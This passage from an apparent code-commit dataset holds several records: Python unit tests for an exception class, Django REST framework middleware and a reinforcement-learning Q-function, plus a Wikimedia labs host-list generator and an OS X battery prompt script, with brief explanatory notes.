self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
|
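The exception class itself is not shown in this commit, but its shape can be read off the assertions: status, uri and msg attributes, msg defaulting to empty, and a fixed str() layout. A reconstruction that satisfies all five tests (a sketch, not the library's actual source):

class SoccermetricsRestException(Exception):
    """Hypothetical implementation inferred from the test expectations."""
    def __init__(self, status, uri, msg=""):
        self.status = status
        self.uri = uri
        self.msg = msg

    def __str__(self):
        head = "HTTP ERROR %s:" % self.status
        if self.msg:
            head += " " + self.msg
        return head + " \n " + self.uri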
a68e78bd0b5174d2c8a40497d3d5842f66c65a34
|
tests/test_middleware.py
|
tests/test_middleware.py
|
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
Add test integrated with middleware
|
Add test integrated with middleware
|
Python
|
bsd-2-clause
|
thedrow/django-rest-framework-1,tomchristie/django-rest-framework,YBJAY00000/django-rest-framework,edx/django-rest-framework,VishvajitP/django-rest-framework,arpheno/django-rest-framework,bluedazzle/django-rest-framework,nhorelik/django-rest-framework,qsorix/django-rest-framework,vstoykov/django-rest-framework,werthen/django-rest-framework,MJafarMashhadi/django-rest-framework,ticosax/django-rest-framework,iheitlager/django-rest-framework,akalipetis/django-rest-framework,potpath/django-rest-framework,raphaelmerx/django-rest-framework,maryokhin/django-rest-framework,brandoncazander/django-rest-framework,kgeorgy/django-rest-framework,HireAnEsquire/django-rest-framework,canassa/django-rest-framework,thedrow/django-rest-framework-1,leeahoward/django-rest-framework,douwevandermeij/django-rest-framework,justanr/django-rest-framework,atombrella/django-rest-framework,kennydude/django-rest-framework,linovia/django-rest-framework,yiyocx/django-rest-framework,raphaelmerx/django-rest-framework,alacritythief/django-rest-framework,tcroiset/django-rest-framework,abdulhaq-e/django-rest-framework,jtiai/django-rest-framework,sbellem/django-rest-framework,MJafarMashhadi/django-rest-framework,James1345/django-rest-framework,tomchristie/django-rest-framework,dmwyatt/django-rest-framework,wzbozon/django-rest-framework,rafaelcaricio/django-rest-framework,sbellem/django-rest-framework,jerryhebert/django-rest-framework,jpulec/django-rest-framework,wzbozon/django-rest-framework,d0ugal/django-rest-framework,cheif/django-rest-framework,vstoykov/django-rest-framework,wwj718/django-rest-framework,sheppard/django-rest-framework,James1345/django-rest-framework,maryokhin/django-rest-framework,johnraz/django-rest-framework,wedaly/django-rest-framework,nryoung/django-rest-framework,douwevandermeij/django-rest-framework,hnakamur/django-rest-framework,potpath/django-rest-framework,uruz/django-rest-framework,leeahoward/django-rest-framework,uploadcare/django-rest-framework,simudream/django-rest-framework,johnraz/django-rest-framework,arpheno/django-rest-framework,damycra/django-rest-framework,maryokhin/django-rest-framework,rubendura/django-rest-framework,damycra/django-rest-framework,justanr/django-rest-framework,hunter007/django-rest-framework,kylefox/django-rest-framework,VishvajitP/django-rest-framework,xiaotangyuan/django-rest-framework,lubomir/django-rest-framework,pombredanne/django-rest-framework,uruz/django-rest-framework,nhorelik/django-rest-framework,rubendura/django-rest-framework,aericson/django-rest-framework,waytai/django-rest-framework,sbellem/django-rest-framework,dmwyatt/django-rest-framework,brandoncazander/django-rest-framework,davesque/django-rest-framework,werthen/django-rest-framework,arpheno/django-rest-framework,rhblind/django-rest-framework,canassa/django-rest-framework,ambivalentno/django-rest-framework,jtiai/django-rest-framework,bluedazzle/django-rest-framework,VishvajitP/django-rest-framework,hnarayanan/django-rest-framework,cyberj/django-rest-framework,James1345/django-rest-framework,jpulec/django-rest-framework,rafaelcaricio/django-rest-framework,HireAnEsquire/django-rest-framework,fishky/django-rest-framework,uruz/django-rest-framework,agconti/django-rest-framework,ashishfinoit/django-rest-framework,brandoncazander/django-rest-framework,kezabelle/django-rest-framework,ezheidtmann/django-rest-framework,sheppard/django-rest-framework,rhblind/django-rest-framework,hnakamur/django-rest-framework,krinart/django-rest-framework,kylefox/django-rest-framework,simudream/django-rest-framework,rafaelcaricio/
django-rest-framework,lubomir/django-rest-framework,rafaelang/django-rest-framework,wangpanjun/django-rest-framework,ossanna16/django-rest-framework,ossanna16/django-rest-framework,mgaitan/django-rest-framework,lubomir/django-rest-framework,kennydude/django-rest-framework,hnarayanan/django-rest-framework,jness/django-rest-framework,alacritythief/django-rest-framework,xiaotangyuan/django-rest-framework,elim/django-rest-framework,d0ugal/django-rest-framework,ebsaral/django-rest-framework,kezabelle/django-rest-framework,qsorix/django-rest-framework,cheif/django-rest-framework,wzbozon/django-rest-framework,iheitlager/django-rest-framework,edx/django-rest-framework,jtiai/django-rest-framework,mgaitan/django-rest-framework,zeldalink0515/django-rest-framework,qsorix/django-rest-framework,kylefox/django-rest-framework,ambivalentno/django-rest-framework,agconti/django-rest-framework,johnraz/django-rest-framework,zeldalink0515/django-rest-framework,damycra/django-rest-framework,aericson/django-rest-framework,hunter007/django-rest-framework,ticosax/django-rest-framework,waytai/django-rest-framework,atombrella/django-rest-framework,elim/django-rest-framework,gregmuellegger/django-rest-framework,sehmaschine/django-rest-framework,andriy-s/django-rest-framework,jpadilla/django-rest-framework,mgaitan/django-rest-framework,leeahoward/django-rest-framework,andriy-s/django-rest-framework,akalipetis/django-rest-framework,abdulhaq-e/django-rest-framework,antonyc/django-rest-framework,davesque/django-rest-framework,ticosax/django-rest-framework,wwj718/django-rest-framework,yiyocx/django-rest-framework,AlexandreProenca/django-rest-framework,alacritythief/django-rest-framework,yiyocx/django-rest-framework,tigeraniya/django-rest-framework,kennydude/django-rest-framework,fishky/django-rest-framework,raphaelmerx/django-rest-framework,bluedazzle/django-rest-framework,cyberj/django-rest-framework,sehmaschine/django-rest-framework,AlexandreProenca/django-rest-framework,sehmaschine/django-rest-framework,nryoung/django-rest-framework,gregmuellegger/django-rest-framework,jerryhebert/django-rest-framework,antonyc/django-rest-framework,MJafarMashhadi/django-rest-framework,dmwyatt/django-rest-framework,ossanna16/django-rest-framework,zeldalink0515/django-rest-framework,ebsaral/django-rest-framework,nryoung/django-rest-framework,fishky/django-rest-framework,ajaali/django-rest-framework,hunter007/django-rest-framework,xiaotangyuan/django-rest-framework,tigeraniya/django-rest-framework,callorico/django-rest-framework,cyberj/django-rest-framework,paolopaolopaolo/django-rest-framework,wangpanjun/django-rest-framework,adambain-vokal/django-rest-framework,ambivalentno/django-rest-framework,hnakamur/django-rest-framework,ezheidtmann/django-rest-framework,YBJAY00000/django-rest-framework,d0ugal/django-rest-framework,pombredanne/django-rest-framework,HireAnEsquire/django-rest-framework,nhorelik/django-rest-framework,canassa/django-rest-framework,abdulhaq-e/django-rest-framework,ebsaral/django-rest-framework,davesque/django-rest-framework,rubendura/django-rest-framework,douwevandermeij/django-rest-framework,jness/django-rest-framework,kgeorgy/django-rest-framework,wwj718/django-rest-framework,jerryhebert/django-rest-framework,ashishfinoit/django-rest-framework,jness/django-rest-framework,kgeorgy/django-rest-framework,delinhabit/django-rest-framework,rhblind/django-rest-framework,sheppard/django-rest-framework,callorico/django-rest-framework,gregmuellegger/django-rest-framework,waytai/django-rest-framework,ezheidtmann/django-rest-framewo
rk,ashishfinoit/django-rest-framework,tigeraniya/django-rest-framework,wedaly/django-rest-framework,delinhabit/django-rest-framework,krinart/django-rest-framework,ajaali/django-rest-framework,buptlsl/django-rest-framework,jpadilla/django-rest-framework,uploadcare/django-rest-framework,hnarayanan/django-rest-framework,jpadilla/django-rest-framework,simudream/django-rest-framework,delinhabit/django-rest-framework,iheitlager/django-rest-framework,paolopaolopaolo/django-rest-framework,justanr/django-rest-framework,andriy-s/django-rest-framework,jpulec/django-rest-framework,aericson/django-rest-framework,AlexandreProenca/django-rest-framework,agconti/django-rest-framework,callorico/django-rest-framework,elim/django-rest-framework,kezabelle/django-rest-framework,linovia/django-rest-framework,cheif/django-rest-framework,tcroiset/django-rest-framework,akalipetis/django-rest-framework,wangpanjun/django-rest-framework,vstoykov/django-rest-framework,buptlsl/django-rest-framework,adambain-vokal/django-rest-framework,atombrella/django-rest-framework,YBJAY00000/django-rest-framework,paolopaolopaolo/django-rest-framework,thedrow/django-rest-framework-1,linovia/django-rest-framework,uploadcare/django-rest-framework,rafaelang/django-rest-framework,ajaali/django-rest-framework,potpath/django-rest-framework,wedaly/django-rest-framework,rafaelang/django-rest-framework,adambain-vokal/django-rest-framework,buptlsl/django-rest-framework,tcroiset/django-rest-framework,antonyc/django-rest-framework,werthen/django-rest-framework,edx/django-rest-framework,pombredanne/django-rest-framework,krinart/django-rest-framework,tomchristie/django-rest-framework
|
Add test integrated with middleware
|
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
<commit_before><commit_msg>Add test integrated with middleware<commit_after>
|
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
Add test integrated with middleware
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
<commit_before><commit_msg>Add test integrated with middleware<commit_after>
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
|
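MIDDLEWARE_CLASSES and process_response, used above, are the old-style middleware hooks. On Django 1.10+ the same check is written as a callable middleware, and is_authenticated is accessed as a property rather than called. A sketch of the equivalent:

class MyMiddleware(object):
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        response = self.get_response(request)
        # Authentication ran inside the view, so user must be set by now.
        assert hasattr(request, 'user'), '`user` is not set on request'
        assert request.user.is_authenticated, '`user` is not authenticated'
        return response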
18ade96032dbbeaee6f96ff364cb3dc8726970da
|
tests/test_q_function.py
|
tests/test_q_function.py
|
import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should result in 75
# percent of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
Add a test for QFunction
|
Add a test for QFunction
|
Python
|
mit
|
toslunar/chainerrl,toslunar/chainerrl
|
Add a test for QFunction
|
import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should result in 75
# percent of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
<commit_before><commit_msg>Add a test for QFunction<commit_after>
|
import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should result in 75
# percent of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
Add a test for QFunctionimport unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should result in 75
# percent of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
<commit_before><commit_msg>Add a test for QFunction<commit_after>import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should result in 75
# percent of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
|
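The 0.7*N and 0.8*N bounds in the test above are wide enough to make flakiness rare: with epsilon=0.5 and two actions, a greedy action is chosen with probability 0.5 + 0.5 * (1/2) = 0.75, so greedy_count is Binomial(1000, 0.75) and the bounds sit roughly 3.65 standard deviations from the mean. A quick check:

import math

N, p = 1000, 0.75
mean = N * p                      # 750 expected greedy picks
std = math.sqrt(N * p * (1 - p))  # ~13.69
print((700 - mean) / std)         # ~ -3.65 sigma
print((800 - mean) / std)         # ~ +3.65 sigma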
f7da0521152101466e6036245ed4ce2f5a0e15fe
|
project-dsh-generator.py
|
project-dsh-generator.py
|
#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for running administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
Add script to generate list of instances in any project
|
Add script to generate list of instances in any project
|
Python
|
cc0-1.0
|
yuvipanda/personal-wiki
|
Add script to generate list of instances in any project
|
#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for running administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
<commit_before><commit_msg>Add script to generate list of instances in any project<commit_after>
|
#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for running administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
Add script to generate list of instances in any project#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for running administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
<commit_before><commit_msg>Add script to generate list of instances in any project<commit_after>#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for running administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
|
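One hardening note on the generator above: the project name is spliced into the query string with %s, which is fine for typical labs project names but breaks on anything needing escaping. A sketch using urlencode (instances_url is a hypothetical helper, not part of the script):

from urllib.parse import urlencode

def instances_url(project_name):
    # Same endpoint and parameters as the script above, but URL-safe.
    params = {
        'action': 'query',
        'list': 'novainstances',
        'niregion': 'eqiad',
        'format': 'json',
        'niproject': project_name,
    }
    return 'https://wikitech.wikimedia.org/w/api.php?' + urlencode(params)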
727b17fd49c37c1b48629944c09e3546eb33774c
|
bin/osx_battery.py
|
bin/osx_battery.py
|
#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
Add Steve Losh's script to display battery status on OS X
|
Add Steve Losh's script to display battery status on OS X
|
Python
|
apache-2.0
|
unixorn/jpb.zshplugin,unixorn/jpb.zshplugin,unixorn/jpb.zshplugin,unixorn/jpb.zshplugin
|
Add Steve Losh's script to display battery status on OS X
|
#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
<commit_before><commit_msg>Add Steve Losh's script to display battery status on OS X<commit_after>
|
#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
Add Steve Losh's script to display battery status on OS X#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
<commit_before><commit_msg>Add Steve Losh's script to display battery status on OS X<commit_after>#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
